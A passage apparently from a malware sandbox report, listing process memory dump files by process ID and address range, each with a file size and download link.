112KB

Download
memory/1204-370-0x00000255B1990000-0x00000255B199A000-memory.dmp

Filesize
40KB

Download
memory/1204-374-0x00000255B1E10000-0x00000255B1E18000-memory.dmp

Filesize
32KB

Download
memory/1280-141-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1280-140-0x0000019E350E0000-0x0000019E35107000-memory.dmp

Filesize
156KB

Download
memory/1288-146-0x0000024630F60000-0x0000024630F87000-memory.dmp

Filesize
156KB

Download
memory/1288-147-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1384-34-0x000001C5FF650000-0x000001C5FF86C000-memory.dmp

Filesize
2.1MB

Download
memory/1404-150-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1404-149-0x000001CE83D30000-0x000001CE83D57000-memory.dmp

Filesize
156KB

Download
memory/1428-153-0x00007FF9F2FF0000-0x00007FF9F3000000-memory.dmp

Filesize
64KB

Download
memory/1428-152-0x000002AA7C1A0000-0x000002AA7C1C7000-memory.dmp

Filesize
156KB

Download
memory/1976-82-0x00007FFA32F70000-0x00007FFA33165000-memory.dmp

Filesize
2.0MB

Download
memory/1976-83-0x00007FFA31BE0000-0x00007FFA31C9E000-memory.dmp

Filesize
760KB

Download
memory/3632-61-0x00000243498C0000-0x00000243498C8000-memory.dmp

Filesize
32KB

Download
memory/5096-16-0x00007FFA14ED0000-0x00007FFA15991000-memory.dmp

Filesize
10.8MB

Download
memory/5096-0-0x00007FFA14ED3000-0x00007FFA14ED5000-memory.dmp

Filesize
8KB

Download
memory/5096-12-0x00007FFA14ED0000-0x00007FFA15991000-memory.dmp

Filesize
10.8MB

Download
memory/5096-11-0x00007FFA14ED0000-0x00007FFA15991000-memory.dmp

Filesize
10.8MB

Download
memory/5096-6-0x000001754EAC0000-0x000001754EAE2000-memory.dmp

Filesize
136KB

Download